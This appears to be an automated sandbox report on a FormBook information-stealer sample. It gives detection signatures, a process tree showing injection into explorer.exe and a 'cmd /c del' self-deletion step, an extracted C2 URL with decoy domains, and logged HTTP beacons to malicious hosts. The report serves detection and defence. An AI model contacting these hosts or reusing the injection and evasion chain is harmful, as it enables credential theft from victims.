Windows Analysis Report
4505682666.exe

Overview

General Information

Sample Name: 4505682666.exe
Analysis ID: 601808
MD5: 9746147d84cb3d6b7a91ac76fc7b74b2
SHA1: 8c70e93e0c8c29b2be64703485c30be238dee7db
SHA256: 6d40fb5818ad031394cb4fa6e0007d69bcdf4396b7f6af749badc7a080c776ae
Tags: exe, formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • 4505682666.exe (PID: 6864 cmdline: "C:\Users\user\Desktop\4505682666.exe" MD5: 9746147D84CB3D6B7A91AC76FC7B74B2)
    • sfxwkrzgst.exe (PID: 6940 cmdline: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj MD5: 4745AFD382988B0E54FCA3B7C6CC62C6)
      • sfxwkrzgst.exe (PID: 7000 cmdline: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj MD5: 4745AFD382988B0E54FCA3B7C6CC62C6)
        • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • NETSTAT.EXE (PID: 6852 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
            • cmd.exe (PID: 6976 cmdline: /c del "C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.stxgvdhndry.mobi/iedi/"], "decoy": ["taschenhimmel.guru", "nychehang.com", "samrgov.xyz", "lumenharleystreet.com", "286241.com", "herramientaspcdigitales.com", "collegesecurityroadshow.com", "fcpt.club", "iphone13promax.art", "karmikdevco.com", "melanin4mermaidstalks.com", "550-29th.com", "bsthuy24h.com", "desertmermaidcreations.com", "fifi8.xyz", "interweavelife.com", "onlylands.icu", "freemanengenharia.com", "referralinstituteatlanta.com", "dugerits.com", "taeksanglee.com", "joycemalaysiaproperty.com", "realautotrade.com", "superstarcoding.com", "exoticcaliweed.com", "civilgraphics.com", "luluxiong.com", "bethmacywriter.com", "industrialohare.com", "sarahkramirez.store", "supertry.online", "paretli.store", "i-collect.art", "mmuhwh.website", "find-me-a-cruise.com", "elysecanoceramics.com", "gpkdc.com", "sandercpa.net", "ricardoramirezvi.com", "ohhhmarketing.com", "siprah.group", "scottsdaletales.net", "xinyue.one", "yayasannurulhudajambi.com", "radoftheday.com", "mygotomaid.com", "withustown.com", "03gjm.xyz", "areta-school.com", "herffchristiansen.com", "jadearray.com", "casamentobiaeval.com", "harmonyineducation.com", "waihekedoctors.com", "malmaten.xyz", "pdqkitchen.com", "techbuzzbusinessgroup.com", "alteribakery.com", "torikawatters.com", "ks-med.store", "xn--22c2bxc0b4e1al.com", "smartlifeblockchain.com", "the-healthyhabits.com", "aoliucncp.com"]}
Source | Rule | Description | Author | Strings
0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      Source | Rule | Description | Author | Strings
      4.0.sfxwkrzgst.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        4.0.sfxwkrzgst.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        4.0.sfxwkrzgst.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        2.2.sfxwkrzgst.exe.2730000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          2.2.sfxwkrzgst.exe.2730000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Source: Process started, Author: frack113, Data: Command: C:\Windows\SysWOW64\NETSTAT.EXE, CommandLine: C:\Windows\SysWOW64\NETSTAT.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\NETSTAT.EXE, NewProcessName: C:\Windows\SysWOW64\NETSTAT.EXE, OriginalFileName: C:\Windows\SysWOW64\NETSTAT.EXE, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3968, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Windows\SysWOW64\NETSTAT.EXE, ProcessId: 6852, ProcessName: NETSTAT.EXE
          Source: File created, Author: frack113, Data: EventID: 11, Image: C:\Users\user\Desktop\4505682666.exe, ProcessId: 6864, TargetFilename: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe
          Source: Process started, Author: frack113, Data: Command: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj, CommandLine: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, ParentCommandLine: "C:\Users\user\Desktop\4505682666.exe" , ParentImage: C:\Users\user\Desktop\4505682666.exe, ParentProcessId: 6864, ParentProcessName: 4505682666.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj, ProcessId: 6940, ProcessName: sfxwkrzgst.exe

          AV Detection

          Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.stxgvdhndry.mobi/iedi/"], "decoy": ["taschenhimmel.guru", "nychehang.com", "samrgov.xyz", "lumenharleystreet.com", "286241.com", "herramientaspcdigitales.com", "collegesecurityroadshow.com", "fcpt.club", "iphone13promax.art", "karmikdevco.com", "melanin4mermaidstalks.com", "550-29th.com", "bsthuy24h.com", "desertmermaidcreations.com", "fifi8.xyz", "interweavelife.com", "onlylands.icu", "freemanengenharia.com", "referralinstituteatlanta.com", "dugerits.com", "taeksanglee.com", "joycemalaysiaproperty.com", "realautotrade.com", "superstarcoding.com", "exoticcaliweed.com", "civilgraphics.com", "luluxiong.com", "bethmacywriter.com", "industrialohare.com", "sarahkramirez.store", "supertry.online", "paretli.store", "i-collect.art", "mmuhwh.website", "find-me-a-cruise.com", "elysecanoceramics.com", "gpkdc.com", "sandercpa.net", "ricardoramirezvi.com", "ohhhmarketing.com", "siprah.group", "scottsdaletales.net", "xinyue.one", "yayasannurulhudajambi.com", "radoftheday.com", "mygotomaid.com", "withustown.com", "03gjm.xyz", "areta-school.com", "herffchristiansen.com", "jadearray.com", "casamentobiaeval.com", "harmonyineducation.com", "waihekedoctors.com", "malmaten.xyz", "pdqkitchen.com", "techbuzzbusinessgroup.com", "alteribakery.com", "torikawatters.com", "ks-med.store", "xn--22c2bxc0b4e1al.com", "smartlifeblockchain.com", "the-healthyhabits.com", "aoliucncp.com"]}
          Source: 4505682666.exe, Virustotal: Detection: 42%
          Source: 4505682666.exe, ReversingLabs: Detection: 52%
          Source: Yara match, File source: 4.0.sfxwkrzgst.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.sfxwkrzgst.exe.2730000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.sfxwkrzgst.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.0.sfxwkrzgst.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.0.sfxwkrzgst.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.0.sfxwkrzgst.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.0.sfxwkrzgst.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.sfxwkrzgst.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: www.stxgvdhndry.mobi/iedi/, Avira URL Cloud: Label: malware
          Source: http://www.sarahkramirez.store/iedi/?m0=2H7NzpX8+kWVL7RXiPeuot7T42yKgqjwvMyAB8WCBja83NZi/HARu3twuNCkw+yHno/S&D48xf=hDK0DtQ, Avira URL Cloud: Label: malware
          Source: http://www.03gjm.xyz/iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1+/c/JNlu63XO4AXvMln8G6I6USgbifPVY53JwlsJRA59FAfbt7UA, Avira URL Cloud: Label: phishing
          Source: http://www.taeksanglee.com/iedi/?m0=uFHIZhV534abe7udANH+fvyGGlu7ONiaMHmjxj5pqC2R3Lmy39g482CU6S2VMO33CU+j&D48xf=hDK0DtQ, Avira URL Cloud: Label: malware
          Source: 4505682666.exe, Joe Sandbox ML: detected
          Source: 4.0.sfxwkrzgst.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.sfxwkrzgst.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.sfxwkrzgst.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.sfxwkrzgst.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4505682666.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 4505682666.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: sfxwkrzgst.exe, 00000004.00000002.335855686.0000000001270000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: netstat.pdb source: sfxwkrzgst.exe, 00000004.00000002.335855686.0000000001270000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: sfxwkrzgst.exe, 00000002.00000003.252451378.0000000002910000.00000004.00001000.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000002.00000003.251040803.0000000002780000.00000004.00001000.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000004.00000002.336274086.000000000139F000.00000040.00000800.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: sfxwkrzgst.exe, sfxwkrzgst.exe, 00000004.00000002.336274086.000000000139F000.00000040.00000800.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\4505682666.exe, Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
          Source: C:\Users\user\Desktop\4505682666.exe, Code function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
          Source: C:\Users\user\Desktop\4505682666.exe, Code function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, Code function: 4x nop then pop ebx, 4_2_00406AB4
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop ebx, 15_2_00426AB5

          Networking

          Source: C:\Windows\explorer.exe, Network Connect: 104.21.60.208 80
          Source: C:\Windows\explorer.exe, Domain query: www.sarahkramirez.store
          Source: C:\Windows\explorer.exe, Domain query: www.taeksanglee.com
          Source: C:\Windows\explorer.exe, Network Connect: 23.225.32.156 80
          Source: C:\Windows\explorer.exe, Domain query: www.stxgvdhndry.mobi
          Source: C:\Windows\explorer.exe, Domain query: www.malmaten.xyz
          Source: C:\Windows\explorer.exe, Network Connect: 99.83.248.72 80
          Source: C:\Windows\explorer.exe, Domain query: www.03gjm.xyz
          Source: C:\Windows\explorer.exe, Network Connect: 203.170.80.250 80
          Source: C:\Windows\explorer.exe, Domain query: www.supertry.online
          Source: C:\Windows\explorer.exe, Domain query: www.ohhhmarketing.com
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\explorer.exe, DNS query: www.malmaten.xyz
          Source: C:\Windows\explorer.exe, DNS query: www.03gjm.xyz
          Source: Malware configuration extractor, URLs: www.stxgvdhndry.mobi/iedi/
          Source: Joe Sandbox View, ASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global traffic, HTTP traffic detected: GET /iedi/?m0=2H7NzpX8+kWVL7RXiPeuot7T42yKgqjwvMyAB8WCBja83NZi/HARu3twuNCkw+yHno/S&D48xf=hDK0DtQ HTTP/1.1 Host: www.sarahkramirez.store Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1+/c/JNlu63XO4AXvMln8G6I6USgbifPVY53JwlsJRA59FAfbt7UA HTTP/1.1 Host: www.03gjm.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /iedi/?m0=uFHIZhV534abe7udANH+fvyGGlu7ONiaMHmjxj5pqC2R3Lmy39g482CU6S2VMO33CU+j&D48xf=hDK0DtQ HTTP/1.1 Host: www.taeksanglee.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 203.170.80.250 203.170.80.250
          Source: 4505682666.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: NETSTAT.EXE, 0000000F.00000002.513921900.00000000032E2000.00000004.10000000.00040000.00000000.sdmp, String found in binary or memory: https://www.03gjm.xyz/iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1
          Source: unknown, DNS traffic detected: queries for: www.stxgvdhndry.mobi
          Source: C:\Users\user\Desktop\4505682666.exe, Code function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056A8

          E-Banking Fraud

          Source: Yara match, File source: 4.0.sfxwkrzgst.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.sfxwkrzgst.exe.2730000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.sfxwkrzgst.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.0.sfxwkrzgst.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.0.sfxwkrzgst.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.0.sfxwkrzgst.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.0.sfxwkrzgst.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.sfxwkrzgst.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 4.0.sfxwkrzgst.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.sfxwkrzgst.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.sfxwkrzgst.exe.2730000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.sfxwkrzgst.exe.2730000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.sfxwkrzgst.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.sfxwkrzgst.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.sfxwkrzgst.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.sfxwkrzgst.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.sfxwkrzgst.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.sfxwkrzgst.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.sfxwkrzgst.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.sfxwkrzgst.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.sfxwkrzgst.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.sfxwkrzgst.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.sfxwkrzgst.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.sfxwkrzgst.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4505682666.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 4.0.sfxwkrzgst.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.sfxwkrzgst.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
